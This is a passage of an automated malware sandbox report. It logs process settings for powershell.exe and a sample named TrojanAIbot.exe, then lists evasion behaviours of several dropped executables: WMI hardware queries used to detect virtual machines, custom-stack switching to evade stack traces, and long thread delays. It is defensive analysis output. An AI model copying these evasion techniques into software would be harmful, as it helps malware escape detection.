                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Switches to a custom stack to bypass stack traces
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI/Special instruction interceptor: Address: 4739024
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI/Special instruction interceptor: Address: 48458D4
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI/Special instruction interceptor: Address: 493724C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI/Special instruction interceptor: Address: 4B5C24C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI/Special instruction interceptor: Address: 4B5B24C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI/Special instruction interceptor: Address: 49A924C
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 3220000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 15F0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 31F0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 3040000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 30D0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 3240000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 5240000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 21E0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2390000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 4390000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1840000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 3330000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 5330000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1040000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2AA0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 4AA0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1200000
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199790
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199683
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199484
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199375
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199265
                                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4504
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 5304
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWindow / User API: threadDelayed 1732
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWindow / User API: threadDelayed 2548
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8842
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 751
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 3346
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 6443
                                Source: C:\Users\user\AppData\Local\Temp\x.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-87754
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI coverage: 3.7 %
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI coverage: 3.7 %
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -30437127721620741s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -200000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99890s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99779s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99672s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99556s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99397s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99280s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98375s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98172s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98046s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97937s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97815s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97669s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97560s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97450s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97334s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97203s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97093s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96984s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96875s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96766s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96656s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96547s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96437s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99874s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99536s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99410s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99054s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98903s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98781s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98672s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98562s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98451s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98328s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98203s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98094s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97984s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97875s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97765s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97656s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97547s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97436s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97328s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97219s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97109s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96872s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96750s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96599s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1200000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199790s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199683s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199484s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199375s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199265s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 2648Thread sleep time: -11068046444225724s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 1436Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5208Thread sleep count: 8842 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep time: -4611686018427385s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5188Thread sleep count: 751 > 30
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 4676Thread sleep time: -200760000s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 4676Thread sleep time: -386580000s >= -30000s
                                Source: C:\Windows\SysWOW64\timeout.exe TID: 5288Thread sleep count: 35 > 30
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 4868Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 6856Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00452492
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00442886
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_004788BD
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,4_2_004339B6
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,4_2_0045CAFA
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00431A86
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0044BD27
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0045DE8F FindFirstFileW,FindClose,4_2_0045DE8F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0044BF8B
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,2_2_0040E500
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99890
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99779
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99672
